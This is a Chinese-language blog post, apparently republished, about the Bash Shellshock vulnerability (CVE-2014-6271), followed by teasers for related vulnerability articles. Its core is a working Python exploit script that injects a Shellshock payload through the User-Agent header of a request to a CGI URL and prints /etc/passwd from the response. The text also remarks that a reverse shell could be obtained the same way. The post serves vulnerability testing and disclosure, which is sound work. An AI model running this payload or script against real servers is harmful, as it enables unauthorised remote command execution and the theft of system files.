Bash远程命令执行漏洞(CVE-2014-6271)分析利用

 这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271),昨天参加完isc,晚上回家测试了一下,写了个python版本的测试小基本,贴上代码:


#coding:utf-8

import urllib,httplib

import sys,re,urlparse

#author:nx4dm1n

#website:www.nxadmin.com

def bash_exp(url):

urlsp=urlparse.urlparse(url)

hostname=urlsp.netloc

urlpath=urlsp.path

conn=httplib.HTTPConnection(hostname)

headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}

conn.request("GET",urlpath,headers=headers)

res=conn.getresponse()

res=res.getheaders()

for passwdstr in res:

print passwdstr[0]+':'+passwdstr[1]

if __name__=='__main__':

#带http

if len(sys.argv)<2:

print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi"

sys.exit()

else:

bash_exp(sys.argv[1])

  脚本执行效果如图所示:

  bash命令执行

  也可以用burp进行测试。

  利用该漏洞其实可以做很多事情,写的python小脚本只是执行了cat /etc/passwd。可以执行反向链接的命令等,直接获取一个shell还是有可能的。不过漏洞存在的条件也比较苛刻,测试找了一些,发现了很少几个存在漏洞。

最新内容请见作者的GitHub页:http://qaseven.github.io/

时间: 2024-10-05 16:24:40

Bash远程命令执行漏洞(CVE-2014-6271)分析利用的相关文章

惠普打印机爆远程命令执行漏洞,黑客可任意操纵你的打印机

本文讲的是惠普打印机爆远程命令执行漏洞,黑客可任意操纵你的打印机,在各类企业.单位甚至是学校,无论你身处在哪里,打印机都会作为必需品存在.也许你体验到的是其便捷的一面,但你是否了解其作为联网设备的危害在哪里呢?仔细回想一下,你上一次更新它的固件是什么时候?你是否了解过打印机所存在的那些漏洞? 出于对打印机安全性的好奇,我们购买了几台打印机(HP OfficeJet Pro 8210).事实上,在买的时候我们一直祈祷其那些易受攻击的固件仍然存在,否则你肯定无法想象你需要多少时间来进行回溯.幸运的是

NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析

本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1.   概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的NSA(美国国家安全局)黑客工具.这批黑客工具中含有可以配合使用的一个攻击框架和多个攻击漏洞.这次的工具主要面向的是Windows系统,攻击框架非常易用,漏洞也大都是核弹级别的RCE(远程命令执行),配合框架和漏洞,可以非常容易地在存在漏洞的 Windows 主机上执行命令.植入后门.一时间,各路选手

又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文件的漏洞攻击的研究分析,其中一次属于零日漏洞攻击. 今年3月开始,FireEye再一次在微软Office产品中陆续发现三个新的零日漏洞,发现时这些漏洞已被野外利用. 第一个漏洞出现在今年的3月下旬,CVE-2017-0261中描述了Office远程代码执行漏洞(RCE)漏洞,FireEye认为该漏洞

程序猿(媛)们注意啦!Git、SVN、Mercurial版本控制系统被爆远程命令执行漏洞

近日,三款主流的源版本控制系统Git.Subversion (svn).Mercurial,发布了更新补丁,修复了一个客户端代码执行漏洞. 恶意的攻击者可以向受害者发送一条精心构造的ssh:// URL链接,当受害者访问这条URL则会触发漏洞导致执行恶意代码. 该漏洞由GitLab的Brian Neel,Recurity Labs的Joan Schneeweiss和GitHub的Jeff King发现和报告.具体详情如下: 漏洞编号: Git: CVE-2017-1000117 Apache S

开发者论坛一周精粹(第四期):Windows系统 SMB/RDP远程命令执行漏洞

第四期(2017年4月8日-2017年4月14日 ) 2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里云上的业务安全,请您关注 [高危漏洞预警]Windows系统 SMB/RDP远程命令执行漏洞 作者:正禾 [漏洞公告]CVE-2016-10229:Linux 内核远程代码执行漏洞 作者:正禾 黑科技?告别幕布,阿里云备案可以"刷脸&q

开发者论坛一周精粹(第十三期):CVE-2017-9791:Struts(S2-048)远程命令执行漏洞

第十三期(2017年7月3日-2017年7月9日 ) 2017年7月7日,Apache Struts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2和Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击,存在安全风险. [漏洞公告]CVE-2017-9791:Struts(S2-048)远程命令执行漏洞 https://bbs.aliyun.com/read/321149.html [漏洞公告]CVE-2017-3143

Roundcube远程命令执行漏洞 绿盟科技发布安全威胁通告

2016年12月6日(当地时间),blog.ripstech.com网站发布了一条关于Roundcube远程命令执行漏洞的消息.在Roundcube1.2.2及其以前的版本中,deliver_message()函数在调用PHP内建函数mail()时的第5个参数可由用户控制且未经恰当过滤,mail()函数被调用后会使得PHP执行sendmail程序,而未经过滤的第5个参数允许对sendmail程序进行配置,从而使得sendmail程序将邮件流量保存在文件中,攻击者可以利用这个机制通过发送邮件将恶意

【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞

2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里云上的业务安全,请您关注,具体漏洞详情如下: 漏洞编号: 暂无 漏洞名称: Windows系统多个SMB\RDP远程命令执行漏洞官方评级: 高危 漏洞描述: 国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可

PayPal远程命令执行漏洞分析

2015年12月,笔者在PayPal的某个分站中发现了一个能够远程执行任意shell命令的java反序列化漏洞,并且能够影响到PayPal的产品数据库.我马上将该漏洞提交给了PayPal,并且很快得到了修复. 漏洞细节 在测试manager.paypal.com这个站点时,我的注意力被post提交中的不寻常的参数"oldForm"所吸引,这个参数的内容就像是base64解码后的复杂对象. 在经过一些研究之后,我意识到这就是能被应用处理的没有经过签名的java序列化对象.这意味着你能将存